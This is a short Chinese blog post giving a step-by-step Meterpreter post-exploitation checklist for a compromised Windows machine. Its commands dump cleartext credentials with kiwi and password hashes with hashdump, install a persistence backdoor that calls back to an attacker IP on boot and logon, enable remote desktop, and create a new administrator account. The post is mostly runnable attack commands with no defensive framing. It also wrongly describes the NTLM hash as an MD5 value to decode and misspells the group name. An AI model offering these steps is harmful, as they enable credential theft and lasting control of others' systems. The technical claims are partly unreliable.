当前位置:   article > 正文

meterpreter后渗透_使用msf kiwi抓不到明文密码

使用msf kiwi抓不到明文密码

1.kiwi爆出明文密码

1.load kiwi 进入kiwi

2.creds_all 得到密码

2.得到用户的hash值

run hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

最后的32ed87bdb5fdc5e9cba88547376818d4是密码用MD5解码

3.建立后门

run persistence -S -U -X -i 3 -p 4444 -r 192.168.1.138

-S:系统启动时加载、-U:用户登陆时加载、-X:开机时自动加载、-i:回连的时间间隔、-r:电脑IP

 4.开启远程桌面连接

run post/windows/manage/enable_rdp 

netstat查看开放的端口 发现3389以开启

 5.创建用户并加入最高用户组

shell 加入shell

chcp 65001 取消乱码

net user zx zx /add 创建 zx 密码 zx

 net localgroup Adminstrators zx /add  加入Administrators这个组

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/41139
推荐阅读
相关标签
  

闽ICP备14008679号